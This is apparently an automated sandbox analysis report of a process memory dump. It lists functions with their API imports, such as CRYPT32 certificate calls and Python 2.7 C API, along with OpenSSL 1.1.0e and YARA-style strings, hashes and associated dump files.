Instruction ID: 8121a269ff11dfecc17a7a0561e4dfbf22f06dad19c68f3368aa66478923e434
Opcode Fuzzy Hash: 95b8984b489447ebb2d485b42fb5c920adb3deb909ac3d899f399a88ca7fe6fc
Instruction Fuzzy Hash: 9901E2B4998301EFD314CF26D54491BBBE4BB88650F80DD9DF8A882300D378D895CF56

Uniqueness

Uniqueness Score: -1.00%

Function 02DB0CD0, Relevance: 9.1, APIs: 6, Instructions: 128COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 02DB0D25
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 02DB0D4A
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000000), ref: 02DB0D62
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000,?,00000000), ref: 02DB0D87

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: f260dab756398816215957b4e6254f0f1f511e0865d08a0c070e88025ca978d4
Instruction ID: 17e6d83cc663adfa7d504af40897ce48a2a37264d9feee2b1be09de2f6c7ba5b
Opcode Fuzzy Hash: f260dab756398816215957b4e6254f0f1f511e0865d08a0c070e88025ca978d4
Instruction Fuzzy Hash: C041A971A40309BBDB10DA59CC91FAFB3A9EF48725F208219FA16973C4EB71ED418760

Uniqueness

Uniqueness Score: -1.00%

Function 02DADA30, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96stringCOMMON

Download Yara Rule

APIs

isspace.MSVCR90 ref: 02DADA74
strchr.MSVCR90 ref: 02DADA8E
isspace.MSVCR90 ref: 02DADAC8
isspace.MSVCR90 ref: 02DADADA

Strings

..\..\openssl-1.1.0e\crypto\conf\conf_mod.c, xrefs: 02DADA3E

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: isspace$strchr
String ID: ..\..\openssl-1.1.0e\crypto\conf\conf_mod.c
API String ID: 3097930973-4068718654
Opcode ID: 536d03f1a8d1af8c1d6494de4781d0a4876d09dca020e4c8bec70d9942046b24
Instruction ID: b320f82e6f2328a22e9204eb65f7bb4a45e56273342e31bb96e08fa0f248abda
Opcode Fuzzy Hash: 536d03f1a8d1af8c1d6494de4781d0a4876d09dca020e4c8bec70d9942046b24
Instruction Fuzzy Hash: DE218B7260C3112BE7214A249C54FB7779B9F92344F084464FCC79B781EB62EE4AC7A1

Uniqueness

Uniqueness Score: -1.00%

Function 02DB0730, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(?,0000000B,00000000,?), ref: 02DB075B
CertGetCertificateContextProperty.CRYPT32(?,0000000B,00000000,?), ref: 02DB078C

Strings

capi_cert_get_fname, xrefs: 02DB073C
..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02DB076F, 02DB079D, 02DB07CC, 02DB07EF

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: CertCertificateContextProperty
String ID: ..\..\openssl-1.1.0e\engines\e_capi.c$capi_cert_get_fname
API String ID: 665277682-1942231813
Opcode ID: f7a14bb6f0d791c029e943d8c7582188da009f8eecbb7291dae00196050ff064
Instruction ID: 51c4b9ed5763d81346a38a943d91e81eef1b4891f6234c9b06f4f059b05f475f
Opcode Fuzzy Hash: f7a14bb6f0d791c029e943d8c7582188da009f8eecbb7291dae00196050ff064
Instruction Fuzzy Hash: 69113472BC0310BAF22072757C91F6F2359CF80F55F540826FA02E6781EAA6CD6589B6

Uniqueness

Uniqueness Score: -1.00%

Function 02D4E072, Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 417COMMON

Download Yara Rule

Strings

wrong type "integer" for ~ operator, xrefs: 02D4E09F
wrong type "string" for ~ operator, xrefs: 02D4E0E3
wrong type "float" for ~ operator, xrefs: 02D4E0C4
wrong type "boolean" for ~ operator, xrefs: 02D4E0F8

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: wrong type "boolean" for ~ operator$wrong type "float" for ~ operator$wrong type "integer" for ~ operator$wrong type "string" for ~ operator
API String ID: 0-2147079349
Opcode ID: f848021064e67dd714969d1837df34ec8ac5d05ac12ba534206041e369998621
Instruction ID: f172d6a5d9f816ef765222ab206aa9726e2e76314986f8b5f94f06f8779e2591
Opcode Fuzzy Hash: f848021064e67dd714969d1837df34ec8ac5d05ac12ba534206041e369998621
Instruction Fuzzy Hash: 3B025CB09083419FD714CF18C480A6AB7E5FF88704F548A6EE9898B351EB74DD96CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02D4D35C, Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 413COMMON

Download Yara Rule

Strings

wrong type "float" for - operator, xrefs: 02D4D398
wrong type "integer" for - operator, xrefs: 02D4D383
wrong type "boolean" for - operator, xrefs: 02D4D3DC
wrong type "string" for - operator, xrefs: 02D4D3BD

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: wrong type "boolean" for - operator$wrong type "float" for - operator$wrong type "integer" for - operator$wrong type "string" for - operator
API String ID: 0-1362131687
Opcode ID: 2784fe323d2413f21854103afd5ac7fad01bed11779632f94f2d4949288f7e1c
Instruction ID: b846776e6d54f56a01b982d1644c395ebf6f59522f09cca506dcea928d48aba1
Opcode Fuzzy Hash: 2784fe323d2413f21854103afd5ac7fad01bed11779632f94f2d4949288f7e1c
Instruction Fuzzy Hash: CF025CB09083419FD714CF18C480A6AB7E5FFC8704F548A6EE9898B355EB70DD96CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02D4CFB7, Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 412COMMON

Download Yara Rule

Strings

wrong type "boolean" for intXXXX or uintXXXX operator, xrefs: 02D4D03E
wrong type "float" for intXXXX or uintXXXX operator, xrefs: 02D4D004
wrong type "integer" for intXXXX or uintXXXX operator, xrefs: 02D4CFE5
wrong type "string" for intXXXX or uintXXXX operator, xrefs: 02D4D019

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: wrong type "boolean" for intXXXX or uintXXXX operator$wrong type "float" for intXXXX or uintXXXX operator$wrong type "integer" for intXXXX or uintXXXX operator$wrong type "string" for intXXXX or uintXXXX operator
API String ID: 0-3777382260
Opcode ID: a1c70777072f0f266a2efe1dbccd0c213d92be5e3ae24dd0346fb685b54476d7
Instruction ID: 6e78982814df585cc26b7bbd1963a582c7bb892275d41a74a71c4caf2dc32e08
Opcode Fuzzy Hash: a1c70777072f0f266a2efe1dbccd0c213d92be5e3ae24dd0346fb685b54476d7
Instruction Fuzzy Hash: 02026DB09083419FD714CF18C480A6AB7E5FFC8304F548A6EE9898B351EB75DD96CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02D4C083, Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 402COMMON

Download Yara Rule

Strings

wrong type "string" for at operator, xrefs: 02D4C0C5
wrong type "integer" for at operator, xrefs: 02D4C0A6
wrong type "boolean" for at operator, xrefs: 02D4C0D8
wrong type "float" for at operator, xrefs: 02D4C0B2

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: wrong type "boolean" for at operator$wrong type "float" for at operator$wrong type "integer" for at operator$wrong type "string" for at operator
API String ID: 0-3797521198
Opcode ID: 3e46466116fd615da96760a379a2a3fe4b115bb0daac859c8e4872f88a40dffe
Instruction ID: ebf8d181c10b23c69573f984654260294cee791967f309156d892c13049e42d0
Opcode Fuzzy Hash: 3e46466116fd615da96760a379a2a3fe4b115bb0daac859c8e4872f88a40dffe
Instruction Fuzzy Hash: 4B024CB09083419FD714CF18C480A6AB7E5FFC8704F548A2EE98987351EB71E996CF92

Uniqueness

Uniqueness Score: -1.00%

Function 02D81DB0, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 83COMMON

Download Yara Rule

APIs

memcpy.MSVCR90 ref: 02D81E62

Part of subcall function 02D899B0: raise.MSVCR90 ref: 02D899CB
Part of subcall function 02D899B0: _exit.MSVCR90 ref: 02D899D5

Strings

assertion failed: *sbuffer != NULL, xrefs: 02D81E4C
..\..\openssl-1.1.0e\crypto\bio\b_print.c, xrefs: 02D81DC3, 02D81DE1, 02D81E24, 02D81E47, 02D81E77
assertion failed: *sbuffer != NULL || buffer != NULL, xrefs: 02D81DC8
assertion failed: *currlen <= *maxlen, xrefs: 02D81DE6

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: _exitmemcpyraise
String ID: ..\..\openssl-1.1.0e\crypto\bio\b_print.c$assertion failed: *currlen <= *maxlen$assertion failed: *sbuffer != NULL$assertion failed: *sbuffer != NULL || buffer != NULL
API String ID: 1298853163-2319055813
Opcode ID: 0855da73e3efda385f8f77d92ad625157b795b34529dce9932583b3502d9d86e
Instruction ID: 8385bdc94b231fb418e76cf607e96ded46ccf362ab6abddb1e57db4b3fecb77d
Opcode Fuzzy Hash: 0855da73e3efda385f8f77d92ad625157b795b34529dce9932583b3502d9d86e
Instruction Fuzzy Hash: 7821F7B5A403119BFB22AF20DC42F2573A5AB40704F144458F99E9B380F7B4DD49CF21

Uniqueness

Uniqueness Score: -1.00%

Function 02D82A00, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 432COMMON

Download Yara Rule

APIs

isdigit.MSVCR90 ref: 02D82B69
isdigit.MSVCR90 ref: 02D82BDA

Strings

*, xrefs: 02D82C07
*, xrefs: 02D82B90

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: isdigit
String ID: *$*
API String ID: 2326231117-3771216468
Opcode ID: 0b04d4b03c3e505bb9aa6df29ae45c1dfec597013477bd21eb3bccd26040a2c0
Instruction ID: b184f4519691bef159c071274b12d412fa2c4a56b9a94863ec4ac186c5e00ce6
Opcode Fuzzy Hash: 0b04d4b03c3e505bb9aa6df29ae45c1dfec597013477bd21eb3bccd26040a2c0
Instruction Fuzzy Hash: E7F137B16082819BE324EF19C888A6BB7E5FFC9704F14491DF98687390D371ED46CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02D82010, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 251COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 02D820F9

Strings

, xrefs: 02D820A4
0123456789abcdef, xrefs: 02D820EC
0123456789ABCDEF, xrefs: 02D820E5

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldvrm
String ID: $0123456789ABCDEF$0123456789abcdef
API String ID: 1302938615-30751140
Opcode ID: d19f4c600e31b35e2dd5ae9bb561ae605be2929b8609071fef37745e6ec78db0
Instruction ID: a523ef5325390e289fdc2ea2e4f6312fa95f73b60720a6bc2b8d4d2f04bc2ab1
Opcode Fuzzy Hash: d19f4c600e31b35e2dd5ae9bb561ae605be2929b8609071fef37745e6ec78db0
Instruction Fuzzy Hash: FE917C75A083858BD714EE29C88872BB7E1ABC8358F58491DFD85A3341D731ED49CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 02D4D76A, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02D4D833
_snprintf.MSVCR90 ref: 02D4D88F

Strings

%I64d * %I64d, xrefs: 02D4D87E
, xrefs: 02D4D8EF

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_snprintf
String ID: $%I64d * %I64d
API String ID: 104839420-2201269613
Opcode ID: 6b4b84f88739844bdac1b578d5b8999d661b3c79936d8dd759c578c0395eb0bf
Instruction ID: 7f54e2e42c165f05175c6b9bacad54dcc73585dbc0e615d1d9d327c22e59eafe
Opcode Fuzzy Hash: 6b4b84f88739844bdac1b578d5b8999d661b3c79936d8dd759c578c0395eb0bf
Instruction Fuzzy Hash: F95119B46083419FD318CF18C594A2ABBF2FBC8700F148A5EE89987351E770EC91CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02DB09E0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82encryptionCOMMON

Download Yara Rule

APIs

CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 02DB0A04
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 02DB0A6C
CertFindCertificateInStore.CRYPT32(?,00000001,00000000,00070007,?,00000000), ref: 02DB0A97

Strings

..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02DB0A56

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: CertStore$CertificatesEnum$CertificateFind
String ID: ..\..\openssl-1.1.0e\engines\e_capi.c
API String ID: 3417037084-79188018
Opcode ID: e75f27b3ce83c7264affb30a8d4f0ea76aaad4ec0f4413fb2c41f99be115b254
Instruction ID: 7bc8c2d83351ee6ab7eb76220b191bcc88a1dcba93b002630523128bfb0f49ab
Opcode Fuzzy Hash: e75f27b3ce83c7264affb30a8d4f0ea76aaad4ec0f4413fb2c41f99be115b254
Instruction Fuzzy Hash: BE11E7367C82019BE72685386870BBB7B5A9FC2A26F184A55FD4F96381D722DC05C250

Uniqueness

Uniqueness Score: -1.00%

Function 02DB0650, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000,?), ref: 02DB066B

Strings

..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02DB067E, 02DB06AA, 02DB06E9, 02DB070C

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: CertCertificateContextProperty
String ID: ..\..\openssl-1.1.0e\engines\e_capi.c
API String ID: 665277682-79188018
Opcode ID: 3a5255a50054cc1ba822b1aaad9d66cc6add0fa83afa24073a5981493274c744
Instruction ID: 7cca68190aed5571ed9ee97a942e73889fe026779a006b3e5155ecaffdc3320a
Opcode Fuzzy Hash: 3a5255a50054cc1ba822b1aaad9d66cc6add0fa83afa24073a5981493274c744
Instruction Fuzzy Hash: CD1156B1BD03217BF61066707C85F6B6358DB40F18F54481AFA06EA3C2F66ACC608AB5

Uniqueness

Uniqueness Score: -1.00%

Function 02D411C0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

PyGILState_Ensure.PYTHON27 ref: 02D411E0
_PyObject_CallMethod_SizeT.PYTHON27(?,write,02E55570,?,?), ref: 02D411F9
PyGILState_Release.PYTHON27(00000000), ref: 02D41202

Strings

write, xrefs: 02D411F3

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: State_$CallEnsureMethod_Object_ReleaseSize
String ID: write
API String ID: 4072352160-2104195679
Opcode ID: 32ea292a2adbdb6aed8432c0c8692b3beb33a5957434a99aa774c8244ca7b8b1
Instruction ID: dd52ce708e542260ccb1473bc098182ac40c07906d63e51f8f849585a709618b
Opcode Fuzzy Hash: 32ea292a2adbdb6aed8432c0c8692b3beb33a5957434a99aa774c8244ca7b8b1
Instruction Fuzzy Hash: 1501C072A443059BD310DF64EC8494FB3E8FB84269F600B1EF5A5C3200D736E996CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02D504E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

malloc.MSVCR90 ref: 02D504E9

Part of subcall function 02D50370: longjmp.MSVCR90(00000000,00000001,out of dynamic memory in yyensure_buffer_stack()), ref: 02D50380

realloc.MSVCR90 ref: 02D50531

Strings

out of dynamic memory in yyensure_buffer_stack(), xrefs: 02D50541
out of dynamic memory in yyensure_buffer_stack(), xrefs: 02D504F9

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: longjmpmallocrealloc
String ID: out of dynamic memory in yyensure_buffer_stack()$out of dynamic memory in yyensure_buffer_stack()
API String ID: 3627333404-1634691470
Opcode ID: 43580f14999a0a2a28a8a33319691a191bdc9f23657d1105791d0771801dab3d
Instruction ID: 389a9571659db3f591db278f1016dc49d027698207c6afe4766f0e47f28600d9
Opcode Fuzzy Hash: 43580f14999a0a2a28a8a33319691a191bdc9f23657d1105791d0771801dab3d
Instruction Fuzzy Hash: A7115AB09047118FD728CF24E404B4A7BF4BF48709F01896EE44A8B711D7B1EA49CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02D51C80, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

malloc.MSVCR90 ref: 02D51C89

Part of subcall function 02D51B80: longjmp.MSVCR90(?,00000001,?,?,?), ref: 02D51B9C

realloc.MSVCR90 ref: 02D51CD1

Strings

out of dynamic memory in yyensure_buffer_stack(), xrefs: 02D51CE1
out of dynamic memory in yyensure_buffer_stack(), xrefs: 02D51C99

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
